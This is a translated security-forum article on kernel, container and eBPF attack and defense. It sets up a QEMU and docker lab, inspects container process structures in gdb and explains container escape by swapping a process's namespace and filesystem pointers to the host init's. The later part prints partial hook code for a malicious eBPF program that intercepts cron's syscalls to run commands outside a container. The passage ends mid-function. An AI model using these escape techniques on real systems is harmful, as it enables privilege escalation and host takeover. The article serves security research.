santaklouse/allinone.md

This article was transcoded by Jian Yue SimpRead, the original address bbs.pediy.com

[Original] Kernel, container, and eBPF attack and defense

[](#Kernel, container, and eBPF attack and defense) Kernel, container, and eBPF attack and defense

Table of contents

[Kernel, container, and eBPF attack and defense preliminary exploration] (#kernel, container, and ebpf attack and defense preliminary exploration)
[Environment build](#Environment build)
[View an in-container process from the kernel's point of view](#View an in-container process from the kernel's point of view)
[From Kernel Vulnerability to Container Escape](#From Kernel Vulnerability to Container Escape)
[From kernel feature to container escape](#From kernel feature to container escape)
libbpf
libbpf-bootstrap
[eBPF user mode program basic structure] (#ebpf user mode program basic structure)
Complete escape by hijacking high-privilege processes through evil eBPF
[Basic introduction and process of cron] (#cron basic introduction and process)
[Hook program analysis](#hook program analysis)
[tested in docker](#tested in docker)
[Hijack sshd process through eBPF](#Hijack sshd process through ebpf)

I was reading some container content recently. Before reading it, I manually implemented a mini-docker. There are a lot of good information on the Internet. I recommend everyone to write one for play. If you want to quickly understand containers, you can also read my notes: https://github.com/OrangeGzY/mini-docker

Environment construction

In the end, an environment like this should be generated:

At present, it seems that all the online debugging is dual-computer debugging, but dual-computer debugging is still troublesome, so it is best to use QEMU to do it.

First compile the corresponding kernel to get vmlinux, bzImage

Note that it must be turned on when compiling the kernel: CONFIG_OVERLAY_FS=y because docker needs the support of the corresponding file system.

Turn on CONFIG_GDB_SCRIPTS=y, CONFIG_DEBUG_INFO=y if you want to debug the kernel later.

Then use syzkaller's create-image.sh.

Modify and add mounts to cgroups:

echo 'debugfs /sys/kernel/debug debugfs defaults 0 0' | sudo tee -a $DIR/etc/fstab
echo 'securityfs /sys/kernel/security securityfs defaults 0 0' | sudo tee -a $DIR/etc/fstab
echo 'configfs /sys/kernel/config/configfs defaults 0 0' | sudo tee -a $DIR/etc/fstab
echo 'binfmt_misc /proc/sys/fs/binfmt_misc binfmt_misc defaults 0 0' | sudo tee -a $DIR/etc/fstab
echo 'tmpfs /sys/fs/cgroup cgroup defaults 0 0' | sudo tee -a $DIR/etc/fstab

Execute: ./create-image.sh to generate the file system.

qemu startup script:

qemu-system-x86_64 \
-drive file=./stretch.img,format=raw \
-m 256 \
-net nic \
-net user,host=10.0.2.10,hostfwd=tcp::23505-:22 \
-enable-kvm \
-kernel ./bzImage \
-append "console=ttyS0 root=/dev/sda earlyprintk=serial" \
-nographic \
-pidfile vm.pid \

The connection command after startup:

ssh-keygen -f "/root/.ssh/known_hosts" -R "[localhost]:23505"
ssh -i ./stretch.id_rsa -p 23505 root@localhost

Finally can enter the system through ssh
```
root@syzkaller:~#
```
Modify the login password:
```
apt install docker-ce
 
vim /etc/ssh/sshd_config
 
PermitRootLogin yes
 
passwd root
 
poweroff
```
If the first step fails then follow:

https://docs.docker.com/engine/install/debian/

https://stackoverflow.com/questions/48002345/docker-ce-depends-libseccomp2-2-3-0-but-2-2-3-3ubuntu3-is-to-be-installe

Re-login to confirm:

Debian GNU/Linux 9 syzkaller ttyS0
 
syzkaller login: root
Password:
Unable to get valid context for root
Last login: Fri Dec 3 14:09:17 UTC 2021 from 10.0.2.10 on pts/0
Linux syzkaller 5.16.0-rc1 #3 SMP PREEMPT Wed Dec 1 09:46:37 PST 2021 x86_64
 
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
 
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
root@syzkaller:~#

Install the corresponding docker-ce, method:

https://docs.docker.com/engine/install/debian/
Here is an official one for checking the corresponding docker runtime environment

https://github.com/moby/moby/blob/master/contrib/check-config.sh

How to use:
```
./check-config.sh /path/to/kernel/.config
```
If it doesn't start up, run this script to check the environment

Then open the corresponding required CONFIG and recompile.

If you still cannot run dockerd directly after the above steps, please follow the steps below to create the container manually by runc

# 1. Get rootfs(out of VM)
docker export $(docker create busybox) -o busybox.tar
 
# 2. put rootfs into VM's .img
root@ubuntu:~/container# mount -o loop ./stretch.img /mnt/chroot/
root@ubuntu:~/container# cp ./busybox.tar /mnt/chroot/root/
root@ubuntu:~/container# umount /mnt/chroot/
 
# 3. Finally, boot the QEMU, and untar the busybox.tar in ~ to rootfs/
root@syzkaller:~# cd rootfs/
root@syzkaller:~/rootfs# pwd
/root/rootfs
root@syzkaller:~/rootfs# ls
bin dev etc home proc root sys tmp usr var
 
# 4. Generate OCI config
docker-runc spec
root@syzkaller:~# ls
config.json rootfs
 
# 5. Run manually,
docker-runc run root@syzkaller:~# docker-runc run guoziyi
/# ls
bin dev etc home proc root sys tmp usr var
/ # id
uid=0(root) gid=0(root)
/ # ps -ef
PID USER TIME COMMAND
    1 root 0:00 sh
    7 root 0:00 ps -ef
/ # exit
 
# 6.
vim-config.json
"root": {
    "path":"root",
    "readonly":"false"
}

final effect:

First we start a top process in the container started by runc:

Mem: 261032K used, 1438232K free, 16624K shrd, 6996K buff, 101932K cached
CPU: 0.0% usr 0.3% sys 0.0% nic 99.4% idle 0.0% io 0.0% irq 0.0% sirq
Load average: 0.00 0.00 0.00 2/77 6
  PID PPID USER STAT VSZ %VSZ CPU %CPU COMMAND
    6 1 root R 1328 0.0 0 0.2 top
    1 0 root S 1336 0.0 0 0.0 sh

It can be seen that there are two processes inside the container at this time, one is the No. 1 process sh, and the other is the No. 6 process top.

Then we run pstree outside the container

root@syzkaller:~# pstree -pl
systemd(1)-+-agetty(244)
           |-agetty(245)
           |-cron(193)
           |-dbus-daemon(189)---{dbus-daemon}(191)
           |-dhclient(225)
           |-rsyslogd(194)-+-{in:imklog}(196)
           | |-{in:imuxsock}(195)
           | `-{rs:main Q:Reg}(197)
           |-sshd(247)-+-sshd(319)---bash(328)---docker-runc(497)-+-sh(507)---top(526)

It can be seen that process No. 1 in the container is actually mapped to process No. 507 outside the container. It is a subprocess of docker-runc. Similarly, the top process in the container is also a child process of 507.

A process in a container from the perspective of the kernel

In this part, we use gdb(gef) from the host machine to target remote to the qemu kernel, and then observe the process of the corresponding container.

The gef plugin is recommended here, which feels much faster than pwndbg.

My personal configuration for the kernel is as follows (1 year expire):

https://paste.ubuntu.com/p/wMvftKv2bV/

The first thing to be clear is that the nature of the process in the container is close to a restricted process on the host with namespace, resource, and file system isolation.

We focus on some structures in task_struct:

/* task_struct member predeclarations (sorted alphabetically): */
 
struct fs_struct;
struct nsproxy;
 
struct task_struct {
 
 
    #ifdef CONFIG_CGROUPS
    /* Control Group info protected by css_set_lock: */
    struct css_set __rcu *cgroups;
    /* cg_list protected by css_set_lock and tsk->alloc_lock: */
    struct list_head cg_list;
 
 
    ......
    /* Namespaces: */
    struct nsproxy *nsproxy;
    ......
    /* Filesystem information: */
    struct fs_struct *fs;
    ......
}

It can be seen that as a process, the corresponding structure is maintained in the PCB of the kernel, two of which are very important one is fs involving working directory or path, one is nsproxy involving namespace, and finally css_set involving resource limitation

We can observe these structures.

struct nsproxy

/*
 * A structure to contain pointers to all per-process
 * namespaces - fs (mount), uts, network, sysvipc, etc.
 *
 * The pid namespace is an exception -- it's accessed using
 * task_active_pid_ns. The pid namespace here is the
 * namespace that children will use.
 *
 * 'count' is the number of tasks holding a reference.
 * The count for each namespace, then, will be the number
 * of nsproxies pointing to it, not the number of tasks.
 *
 * The nsproxy is shared by tasks which share all namespaces.
 * As soon as a single namespace is cloned or unshared, the
 * nsproxy is copied.
 */
struct nsproxy {
    atomic_t count; //refcount
    struct uts_namespace *uts_ns;
    struct ipc_namespace *ipc_ns;
    struct mnt_namespace *mnt_ns;
    struct pid_namespace *pid_ns_for_children; // pid namespace is special, I remember that it takes effect after fork after setting, he will use the child process after fork as the first process of new namespace
    struct net *net_ns;
    struct time_namespace *time_ns;
    struct time_namespace *time_ns_for_children;
    struct cgroup_namespace *cgroup_ns;
};

struct fs_struct

struct fs_struct {
    int users;
    spinlock_t lock;
    seqcount_spinlock_t seq;
    int umask;
    int in_exec;
    struct path root, pwd;
} __randomize_layout;
 
struct path {
    struct vfsmount *mnt;
    struct dentry *dentry;
} __randomize_layout;
 
 
 
struct dentry {
    /* RCU lookup touched fields */
    unsigned int d_flags; /* protected by d_lock */
    seqcount_spinlock_t d_seq; /* per dentry seqlock */
    struct hlist_bl_node d_hash; /* lookup hash list */
    struct dentry *d_parent; /* parent directory */
    struct qstr d_name;
    struct inode *d_inode; /* Where the name belongs to - NULL is
                     * negative */
    unsigned char d_iname[DNAME_INLINE_LEN]; /* small names */
 
    /* Ref lookup also touches following */
    struct lockref d_lockref; /* per-dentry lock and refcount */
    const struct dentry_operations *d_op;
    struct super_block *d_sb; /* The root of the dentry tree */
    unsigned long d_time; /* used by d_revalidate */
    void *d_fsdata; /* fs-specific data */
 
    union {
        struct list_head d_lru; /* LRU list */
        wait_queue_head_t *d_wait; /* in-lookup ones only */
    };
    struct list_head d_child; /* child of parent list */
    struct list_head d_subdirs; /* our children */
    /*
     * d_alias and d_rcu can share memory
     */
    union {
        struct hlist_node d_alias; /* inode alias list */
        struct hlist_bl_node d_in_lookup_hash; /* only for in-lookup ones */
         struct rcu_head d_rcu;
    } d_u;
} __randomize_layout;
....

struct fs_struct
    -> struct path root
        -> struct dentry *dentry -> struct qstr d_name;

You can see the working directory of process No. 1 in the container:

gef➤ p ((struct task_struct *)0xffff88800c1b8000)->fs->root->dentry->d_name
$12 = {
  {
    {
      hash = 0x2a81534f,
      len = 0x6
    },
    hash_len = 0x62a81534f
  },
  name = 0xffff8880100a7b38 "rootfs"
}
gef➤

fs:

# container init
gef➤ p *$t->fs
$11 = {
 ......
  umask = 0x12,
  in_exec = 0x0,
  root = {
    mnt = 0xffff888010b86320,
    dentry = 0xffff8880120b5700
  },
  pwd = {
    mnt = 0xffff888010b86320,
    dentry = 0xffff88801235d900
  }
}
 
# host init
gef➤ p *$init->fs
$12 = {
......
  umask = 0x0,
  in_exec = 0x0,
  root = {
    mnt = 0xffff8880076b8da0,
    dentry = 0xffff888008119200
  },
  pwd = {
    mnt = 0xffff8880076b8da0,
    dentry = 0xffff888008119200
  }
}

namespace:

gef➤ p *(struct nsproxy*)$t->nsproxy
$3 = {
  count = {
    counter = 0x1
  },
  uts_ns = 0xffff88800c6e91f0,
  ipc_ns = 0xffff88801000e800,
  mnt_ns = 0xffff88800694e800,
  pid_ns_for_children = 0xffff88800cedd0c8,
  net_ns = 0xffff88800ec78d40,
  time_ns = 0xffffffff853ec0e0 ,
  time_ns_for_children = 0xffffffff853ec0e0 ,
  cgroup_ns = 0xffffffff853f4680 }
 
# init process
gef➤ p *(struct nsproxy *)0xffffffff852cd8a0
$4 = {
  count = {
    counter = 0x4c
  },
  uts_ns = 0xffffffff8521a720 ,
  ipc_ns = 0xffffffff855a62a0 ,
  mnt_ns = 0xffff88800694e000,
  pid_ns_for_children = 0xffffffff852cbf20 ,
  net_ns = 0xffffffff858945c0 ,
  time_ns = 0xffffffff853ec0e0 ,
  time_ns_for_children = 0xffffffff853ec0e0 ,
  cgroup_ns = 0xffffffff853f4680 }

It can be seen that, from the perspective of namespace, the ns of the No. 1 process in the container is different from the ns of the No. 1 process of the virtual machine itself. uts, ipc, mnt, pid, etc. are all new.

cred:

container process

gef➤ p *$t->cred
$8 = {
  usage = {
    counter = 0x3
  },
  uid = {
    val = 0x0
  },
  gid = {
    val = 0x0
  },
  suid = {
    val = 0x0
  },
  sgid = {
    val = 0x0
  },
  euid = {
    val = 0x0
  },
  egid = {
    val = 0x0
  },
  fsuid = {
    val = 0x0
  },
  fsgid = {
    val = 0x0
  },
  securebits = 0x0,
  cap_inheritable = {
    cap = {0x20000420, 0x0}
  },
  cap_permitted = {
    cap = {0x20000420, 0x0}
  },
  cap_effective = {
    cap = {0x20000420, 0x0}
  },
  cap_bset = {
    cap = {0x20000420, 0x0}
  },
  cap_ambient = {
    cap = {0x0, 0x0}
  },

host process:

gef➤ p *$init->cred
$10 = {
  usage = {
    counter = 0xb
  },
  uid = {
    val = 0x0
  },
  gid = {
    val = 0x0
  },
  suid = {
    val = 0x0
  },
  sgid = {
    val = 0x0
  },
  euid = {
    val = 0x0
  },
  egid = {
    val = 0x0
  },
  fsuid = {
    val = 0x0
  },
  fsgid = {
    val = 0x0
  },
  securebits = 0x0,
  cap_inheritable = {
    cap = {0x0, 0x0}
  },
  cap_permitted = {
    cap = {0xffffffff, 0x1ff}
  },
  cap_effective = {
    cap = {0xffffffff, 0x1ff}
  },
  cap_bset = {
    cap = {0xffffffff, 0x1ff}
  },
  cap_ambient = {
    cap = {0x0, 0x0}
  },

It can be seen that although the ids are all 0, their Caps are different. The init process of the host has a complete CAP, but the init process of the container has only a few Capabilities.

root@ubuntu:~/container/module_for_container# capsh --decode=0x20000420
WARNING: libcap needs an update (cap=40 should have a name).
0x0000000020000420=cap_kill,cap_net_bind_service,cap_audit_write
 
 
root@ubuntu:~/container/module_for_container# capsh --decode=0xffffffff
WARNING: libcap needs an update (cap=40 should have a name).
0x00000000ffffffff=cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice, cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap

From Kernel Vulnerabilities to Container Escapes

The principle of escaping from the kernel to the container is actually very simple. It is to switch the nsproxy and fs of the sh process in the current docker to the host process (preferably the host init process). To achieve this effect, the following conditions must be met:

The task_struct of a certain process (preferably the init process) of the host can be obtained through traversal.
Can read and write the data of the corresponding task_struct, modify the fs and nsproxy of the current process (for example, directly change the corresponding pointer to point to the init process, or call switch_task_namespaces to switch ns)

In the actual test, when we change the fs of the task_struct of the process to the corresponding init_fs. A basic escape can already be achieved.
With this foundation, it is actually easy to think that we can actually let the container process escape to the ns and fs of any other process, as long as the corresponding information is switched.

Further, we can try to find out how to do a heap spray for init_fs.

From kernel features to container escapes

The difference between this part and the previous part is that we do not directly complete the entire process of container escape through kernel vulnerabilities, but maliciously complete container escape through some Linux features.

Since eBPF itself is a kernel-mode module and can be used for almost indistinguishable hooks, a simple idea is to hook some services (user-mode processes) that run in user-mode and can execute commands through eBPF, and then do A command execution outside the container. Or through eBPF to directly read sensitive data in the kernel state to cause leakage, auxiliary escape or information leakage.

libbpf

https://github.com/libbpf/libbpf

libbpf The project itself is similar to

First we need the corresponding btf support:

If your kernel doesn't come with BTF built-in, you'll need to build custom kernel. You'll need:

pahole 1.16+ tool (part of dwarves package), which performs DWARF to BTF conversion;

kernel built with CONFIG_DEBUG_INFO_BTF=y option;

check it out:

root@syzkaller:~# ls -la /sys/kernel/btf/vmlinux
-r--r--r--. 1 root root 5883079 Dec 7 07:05 /sys/kernel/btf/vmlinux

libbpf-bootstrap

https://github.com/libbpf/libbpf-bootstrap

git clone https://github.com/libbpf/libbpf-bootstrap.git
 
cd libbpf-bootstrap
 
cd libbpf/src && make
 
cd ../../examples/c

Next, create the corresponding hello file:

/* cat hello.bpf.c */
#include #include SEC("tracepoint/syscalls/sys_enter_execve")
int handle_tp(void *ctx)
{
    int pid = bpf_get_current_pid_tgid() >> 32;
    char fmt[] = "BPF triggered from PID %d.\n";
    bpf_trace_printk(fmt, sizeof(fmt), pid);
    return 0;
}
 
char LICENSE[] SEC("license") = "Dual BSD/GPL";

/* cat hello.c */
#include #include #include #include #include #include #include #include #include #include "hello.skel.h"
 
#define DEBUGFS "/sys/kernel/debug/tracing/"
 
/* logging function used for debugging */
static int libbpf_print_fn(enum libbpf_print_level level, const char *format, va_list args)
{
#ifdef DEBUGBPF
    return vfprintf(stderr, format, args);
#else
    return 0;
#endif
}
 
/* read trace logs from debug fs */
void read_trace_pipe(void)
{
    int trace_fd;
 
    trace_fd = open(DEBUGFS "trace_pipe", O_RDONLY, 0);
    if (trace_fd < 0)
        return;
 
    while (1) {
        static char buf[4096];
        ssize_t sz;
 
        sz = read(trace_fd, buf, sizeof(buf) - 1);
        if (sz> 0) {
            buf[sz] = 0;
            puts(buf);
        }
    }
}
 
/* set rlimit (required for every app) */
static void bump_memlock_rlimit(void)
{
    struct rlimit rlim_new = {
        .rlim_cur = RLIM_INFINITY,
        .rlim_max = RLIM_INFINITY,
    };
 
    if (setrlimit(RLIMIT_MEMLOCK, &rlim_new)) {
        fprintf(stderr, "Failed to increase RLIMIT_MEMLOCK limit!\n");
        exit(1);
    }
}
 
int main(int argc, char **argv)
{
    struct hello_bpf *skel;
    int err;
 
    /* Set up libbpf errors and debug info callback */
    libbpf_set_print(libbpf_print_fn);
 
    /* Bump RLIMIT_MEMLOCK to allow BPF sub-system to do anything */
    bump_memlock_rlimit();
 
    /* Open BPF application */
    skel = hello_bpf__open();
    if (!skel) {
        fprintf(stderr, "Failed to open BPF skeleton\n");
        return 1;
    }
 
    /* Load & verify BPF programs */
    err = hello_bpf__load(skel);
    if (err) {
        fprintf(stderr, "Failed to load and verify BPF skeleton\n");
        goto cleanup;
    }
 
    /* Attach tracepoint handler */
    err = hello_bpf__attach(skel);
    if (err) {
        fprintf(stderr, "Failed to attach BPF skeleton\n");
        goto cleanup;
    }
 
    printf("Hello BPF started, hit Ctrl+C to stop!\n");
 
    read_trace_pipe();
 
cleanup:
    hello_bpf__destroy(skel);
    return -err;
}

Update the corresponding Makefile in the current directory:

APPS = minimal bootstrap uprobe kprobe fentry hello

Finally run make

Then run ./hello

output:

root@ubuntu:~/libbpf-bootstrap/examples/c# ./hello
Hello BPF started, hit Ctrl+C to stop!
            node-6172 [001] d... 1730.240057: bpf_trace_printk: BPF triggered from PID 6172.
 
 
              sh-6174 [000] d... 1730.245028: bpf_trace_printk: BPF triggered from PID 6174.
 
 
              sh-6173 [003] d... 1730.247639: bpf_trace_printk: BPF triggered from PID 6173.
 
 
            node-6175 [003] d... 1734.181666: bpf_trace_printk: BPF triggered from PID 6175.
 
 
              sh-6177 [002] d... 1734.184994: bpf_trace_printk: BPF triggered from PID 6177.
 
 
              sh-6176 [001] d... 1734.187739: bpf_trace_printk: BPF triggered from PID 6176.

Indicates success.

eBPF User Mode Program Basic Structure

https://facebookmicrosites.github.io/bpf/blog/2020/02/20/bcc-to-libbpf-howto-guide.html

/* cat hello.bpf.c */
#include #include SEC("tracepoint/syscalls/sys_enter_execve")
int handle_tp(void *ctx)
{
    int pid = bpf_get_current_pid_tgid() >> 32;
    char fmt[] = "BPF triggered from PID %d.\n";
    bpf_trace_printk(fmt, sizeof(fmt), pid);
    return 0;
}
 
char LICENSE[] SEC("license") = "Dual BSD/GPL";

First of all, bpf.h mainly defines a bunch of define and struct.

bpf_helpers.h mainly contains some helper macros and functions.

/*
 * Helper macro to place programs, maps, license in
 * different sections in elf_bpf file. Section names
 * are interpreted by libbpf depending on the context (BPF programs, BPF maps,
 * extern variables, etc).
 * To allow use of SEC() with externs (eg, for extern .maps declarations),
 * make sure __attribute__((unused)) doesn't trigger compilation warning.
 */
#define SEC(name) \
    _Pragma("GCC diagnostic push") \
    _Pragma("GCC diagnostic ignored \"-Wignored-attributes\"") \
    __attribute__((section(name), used)) \
    _Pragma("GCC diagnostic pop")

SEC is used to specify the corresponding type, and libbpf will interpret it according to the context and place it on different sections of elf_bpf.

There are mainly three functions in hello.c:

#define DEBUGFS "/sys/kernel/debug/tracing/"
 
/* logging function used for debugging */
static int libbpf_print_fn(enum libbpf_print_level level, const char *format, va_list args)
{
#ifdef DEBUGBPF
    return vfprintf(stderr, format, args);
#else
    return 0;
#endif
}

Here, the output standard of bpf debug is specified by libbpf_set_print(libbpf_print_fn);. Use vfprintf to output from stderr.

Next, set the corresponding rlimit by:

/* Bump RLIMIT_MEMLOCK to allow BPF sub-system to do anything */
bump_memlock_rlimit();

/* set rlimit (required for every app) */
static void bump_memlock_rlimit(void)
{
    struct rlimit rlim_new = {
        .rlim_cur = RLIM_INFINITY,
        .rlim_max = RLIM_INFINITY,
    };
 
    if (setrlimit(RLIMIT_MEMLOCK, &rlim_new)) {
        fprintf(stderr, "Failed to increase RLIMIT_MEMLOCK limit!\n");
        exit(1);
    }
}

You can see that the value is set to the maximum here.

Finally, there is a read_trace_pipe(); to read the log information:

/* read trace logs from debug fs */
void read_trace_pipe(void)
{
    int trace_fd;
 
    trace_fd = open(DEBUGFS "trace_pipe", O_RDONLY, 0);
    if (trace_fd < 0)
        return;
 
    while (1) {
        static char buf[4096];
        ssize_t sz;
 
        sz = read(trace_fd, buf, sizeof(buf) - 1);
        if (sz> 0) {
            buf[sz] = 0;
            puts(buf);
        }
    }
}

In addition, there are some other functions.

We notice that in hello.c there is:

#include "hello.skel.h"

This file should be generated by Generate BPF skeletons during compilation.

/* Open BPF application */
skel = hello_bpf__open();
if (!skel) {
    fprintf(stderr, "Failed to open BPF skeleton\n");
    return 1;
}
 
/* Load & verify BPF programs */
err = hello_bpf__load(skel);
if (err) {
    fprintf(stderr, "Failed to load and verify BPF skeleton\n");
    goto cleanup;
}
 
/* Attach tracepoint handler */
err = hello_bpf__attach(skel);
if (err) {
    fprintf(stderr, "Failed to attach BPF skeleton\n");
    goto cleanup;
}

root@ubuntu:~/libbpf-bootstrap/examples/c# cd .output/ && ls
bootstrap.bpf.o bootstrap.skel.h fentry.bpf.o fentry.skel.h hello.o kprobe.bpf.o kprobe.skel.h libbpf.a minimal.o pkgconfig uprobe.o
bootstrap.o bpf fentry.o hello.bpf.o hello.skel.h kprobe.o libbpf minimal.bpf.o minimal.skel.h uprobe.bpf.o uprobe.skel.h

Under the .output directory.

Hijacking high-privilege processes through evil eBPF to complete escape

In November, a classmate of Tencent Blue Army posted an interesting article: https://security.tencent.com/index.php/blog/msg/206

There are still many points to study in the follow-up of this article. First, we complete the evil eBPF program.

My implementation code: https://github.com/OrangeGzY/Eebpf-kit/blob/main/libbpf-bootstrap/examples/c/hello.bpf.c

cron basic introduction and process

man cron
 
NAME
       cron - daemon to execute scheduled commands (Vixie Cron)

On ubuntu we are using Vixie Cron

https://www.runoob.com/w3cnote/linux-crontab-tasks.html

root 800 1 0 02:17 ? 00:00:00 /usr/sbin/cron -f

https://github.com/vixie/cron/tree/master

In the source code, we mainly focus on the load_database function of https://github.com/vixie/cron/blob/master/database.c.

#define CRONDIR "/var/spool/cron"
#define SPOOL_DIR "crontabs"
#define SYSCRONTAB "/etc/crontab"
 
 
#define TMAX(a,b) (is_greater_than(a,b)?(a):(b))
#define TEQUAL(a,b) (a.tv_sec == b.tv_sec && a.tv_nsec == b.tv_nsec)
 
 
/* before we start loading any data, do a stat on SPOOL_DIR
     * so that if anything changes as of this moment (ie, before we've
     * cached any of the database), we'll see the changes next time.
     */
if (stat(SPOOL_DIR, &statbuf) < OK) {
        log_it("CRON", getpid(), "STAT FAILED", SPOOL_DIR);
        (void) exit(ERROR_EXIT);
    }
/* track system crontab file
     */
if (stat(SYSCRONTAB, &syscron_stat) < OK)
        syscron_stat.st_mtim = ts_zero;
 
/* if spooldir's mtime has not changed, we don't need to fiddle with
 * the database.
 *
 * Note that old_db->mtime is initialized to 0 in main(), and
 * so is guaranteed to be different than the stat() mtime the first
 * time this function is called.
 */
if (TEQUAL(old_db->mtim, TMAX(statbuf.st_mtim, syscron_stat.st_mtim))) {
    Debug(DLOAD, ("[%ld] spool dir mtime unch, no load needed.\n",
              (long)getpid()))
    return;
}
/* something's different. make a new database, moving unchanged
 * elements from the old database, reloading elements that have
 * actually changed. Whatever is left in the old database when
 * we're done is chaff -- crontabs that disappeared.
 */
new_db.mtim = TMAX(statbuf.st_mtim, syscron_stat.st_mtim);
new_db.head = new_db.tail = NULL;
 
if (!TEQUAL(syscron_stat.st_mtim, ts_zero))
    process_crontab("root", NULL, SYSCRONTAB, &syscron_stat,&new_db, old_db);

It can be seen that after four checks, it is called directly: process_crontab.

First of all, the first two judgments, use stat to get the last modification time of the corresponding SPOOL_DIR and SYSCRONTAB files, and put them into the corresponding stat.

struct stat
{
    dev_t st_dev; /* ID of device containing file */The device number used by the file
    ino_t st_ino; /* inode number */ inode number
    mode_t st_mode; /* protection */ The mode, file, directory, etc. corresponding to the file
    nlink_t st_nlink; /* number of hard links */ The number of hard links in the file 
    uid_t st_uid; /* user ID of owner */ owner user ID
    gid_t st_gid; /* group ID of owner */ group ID 
    dev_t st_rdev; /* device ID (if special file) */ device number of the device file
    off_t st_size; /* total size, in bytes */ file size in bytes  
    blksize_t st_blksize; /* blocksize for file system I/O */ The size of the disk block containing the file  
    blkcnt_t st_blocks; /* number of 512B blocks allocated */ Disk blocks occupied by the file 
    time_t st_atime; /* time of last access */ The last time the file was accessed  
    time_t st_mtime; /* time of last modification */ /The time when the file was last modified  
    time_t st_ctime; /* time of last status change */ The last time the status of the file was changed  
};

The third is to judge whether the ratio of mtim of old_db to TMAX(statbuf.st_mtim, syscron_stat.st_mtim) has changed, in fact, whether it is updated. TMAX(statbuf.st_mtim, syscron_stat.st_mtim) Here is the maximum (latest) update time of the two files. Finally, record the latest time through new_db.

Finally, as long as the latest modification time of syscron is not ts_zero, you can enter: process_crontab("root", NULL, SYSCRONTAB, &syscron_stat,&new_db, old_db);

const struct timespec ts_zero = {.tv_sec = 0L, .tv_nsec = 0L}

in process_crontab

// tabname = "/etc/crontab"
if ((crontab_fd = open(tabname, O_RDONLY|O_NONBLOCK|O_NOFOLLOW, 0)) < OK) {
    /* crontab not accessible?
     */
    log_it(fname, getpid(), "CAN'T OPEN", tabname);
    goto next_crontab;
}
if (fstat(crontab_fd, statbuf) < OK) {
    log_it(fname, getpid(), "FSTAT FAILED", tabname);
    goto next_crontab;
}
 
/* if crontab has not changed since we last read it
 * in, then we can just use our existing entry.
 */
if (TEQUAL(u->mtim, statbuf->st_mtim)) {
    Debug(DLOAD, (" [no change, using old data]"))
    unlink_user(old_db, u);
    link_user(new_db, u);
    goto next_crontab;
}

It can be seen that first use fstat to judge, and then judge whether crontab is updated. final load_user

You can take a look at the structure corresponding to user:

typedef struct _user {
    struct _user *next, *prev; /* links */
    char *name;
    struct timespec mtim; /* last modtime of crontab */
    entry *crontab; /* this person's crontab */
} user;
 
typedef struct _entry {
    struct _entry *next;
    struct passwd *pwd;
    char **envp;
    char *cmd;
    bitstr_t bit_decl(minute, MINUTE_COUNT);
    bitstr_t bit_decl(hour, HOUR_COUNT);
    bitstr_t bit_decl(dom, DOM_COUNT);
    bitstr_t bit_decl(month, MONTH_COUNT);
    bitstr_t bit_decl(dow, DOW_COUNT);
    int flags;
#define MIN_STAR 0x01
#define HR_STAR 0x02
#define DOM_STAR 0x04
#define DOW_STAR 0x08
#define WHEN_REBOOT 0x10
#define DONT_LOG 0x20
} entry;

You can see the cmd that maintains the crontab of the corresponding user.

Eventually our job will be queued and run by job_runqueue() calling do_command(j->e, j->u).

typedef struct _job {
    struct _job *next;
    entry *e;
    user *u;
} job;
 
int
job_runqueue(void) {
    job *j, *jn;
    int run = 0;
 
    for (j = jhead; j; j = jn) {
        do_command(j->e, j->u); // run
        jn = j->next;
        free(j);
        run++;
    }
    jhead = jtail = NULL;
    return (run);
}

Hook program analysis

First go to the system call corresponding to the Hook from sys_enter. Get the current syscall id, get the corresponding file name from the process commandline (compare whether it is cron), and then assign different processing functions according to the different system calls we capture.

Correspondingly, we are also in a symmetrical position, that is, hooking when each syscall exits, mainly involving the modification of the return value.

// When we enter syscall
SEC("raw_tracepoint/sys_enter")
int raw_tp_sys_enter(struct bpf_raw_tracepoint_args *ctx)
{
    unsigned long syscall_id = ctx->args[1];
    char comm[TASK_COMM_LEN];
    bpf_get_current_comm(&comm, sizeof(comm));
    // executable is not cron, return
    if (memcmp(comm, TARGET_NAME, sizeof(TARGET_NAME))){
        return 0;
    }
 
    //bpf_printk("cron trigger!\n");
    switch(syscall_id)
    {
        case 0:
            handle_enter_read(ctx);
            break;
        case 3: // close
            handle_enter_close(ctx);
            break;
        case 4:
            handle_enter_stat(ctx);
            break;
        case 5:
            handle_enter_fstat(ctx);
            break;
        case 257:
            handle_enter_openat(ctx);
            break;
        default:
            //bpf_printk("None of targets , break");
            return 0;
    }
    return 0;
}

// When we exit syscall
SEC("raw_tracepoint/sys_exit")
int raw_tp_sys_exit(struct bpf_raw_tracepoint_args *ctx)
{
  unsigned int id=0;
  struct pt_regs *regs;
  if (cron_pid == 0)
        return 0;
    int pid = bpf_get_current_pid_tgid() & 0xffffffff;
    if (pid != cron_pid)
        return 0;
 
  //bpf_printk("Hit pid: %d\n",pid);
 
  regs = (struct pt_regs *)(ctx->args[0]);
  // Read syscall_id from orig_ax
  id = BPF_CORE_READ(regs,orig_ax);
  switch(id)
    {
        case 0:
            handle_exit_read(ctx);
            break;
        case 4:
            handle_exit_stat();
            break;
        case 5:
            handle_exit_fstat();
            break;
        case 257:
            handle_exit_openat(ctx);
            break;
        default:
            return 0;
    }
 
  return 0;
}

handle_enter_stat(ctx)

stat to enter.

First read the filename from rdi into a buffer, then make sure the filename is /etc/crontab or crontabs

Next, get the current pid and file name, which are stored in global variables.

Then a crucial step is to obtain the address of the corresponding statbuf structure (struct stat) through rsi, and also put it into a global variable.

/*
 
https://lore.kernel.org/bpf/[email protected]/
https://github.com/time-river/Linux-eBPF-Learning/tree/main/4-CO-RE
https://vvl.me/2021/02/eBPF-2-example-openat2/
 
*/
static __inline int handle_enter_stat(struct bpf_raw_tracepoint_args *ctx){
  struct pt_regs *regs;
    char buf[0x40];
    char *pathname ;
 
    regs = (struct pt_regs *)(ctx->args[0]);
 
  // Read the correspoding string which ends at NULL
